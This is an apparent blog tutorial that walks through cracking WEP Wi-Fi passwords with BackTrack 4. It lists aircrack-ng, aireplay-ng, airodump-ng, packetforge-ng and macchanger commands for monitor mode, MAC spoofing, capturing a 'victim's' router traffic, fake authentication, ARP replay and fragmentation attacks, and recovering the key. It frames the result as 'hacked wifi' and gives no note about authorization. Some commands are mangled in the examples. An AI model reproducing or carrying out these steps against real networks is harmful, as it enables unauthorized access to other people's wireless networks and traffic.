WEP Cracking with Backtrack How to crack Wifi Password

First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

  • Login: root
  • Password: toor

Once logged in, type in: startx
BT4 is now set up, heres the following.

  • Open konsole and type the following to start up network connections./etc/init.d/networking start
  • Now we are going to put the network card into monter mode by typing the following.
    • airmon-ng
      (You will find your Interface here)
  • So first start up the scan
    • airmon-ng start wlan0 or 1
      (depends on what it reads your card as, replace as needed)
  • Lets spoof your MAC address first by typing this next command.
    • ifconfig wlan1 down
      macchanger -r wlan1
      ifconfig wlan1 up
    • This will make it so we change our MAC address to the computer we are connecting to
  • Time to start finding our victims router, type in konsole.
    • airodump-ng mon0
    • This will show the list and once you find one that suits your interest, Continue.
  • Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole
    • airodump-ng -c channel number, –bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)
    • example: airodump-ng -c 1 – – bssid 11:22:33:44:55:66 -w wepcap mon0
  • Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:
    • aireplay-ng -1 1 -a The BSSID of the router, then the interface.
      example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0
  • Almost done, we just need to contune the ARP cycle, open another konsole and type:
    • aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.
    • Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL – C to stop the process and continue to 9.
  • Time to start cracking that cap file :D Open a new konsole and type.
    • aircrack-ng -b (bssid) (file name)-01.cap
      example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
  • Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)
  • Here is some alternate methods of using backtrack to get from Hakunamatata69 Tutorial that are interesting and work too.

1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k -l -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) –bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap


1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***


Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

45 minutes to write
10 minutes to edit
5 minutes to read
and only 1 second to say thanks, Ok :D

Leave a Reply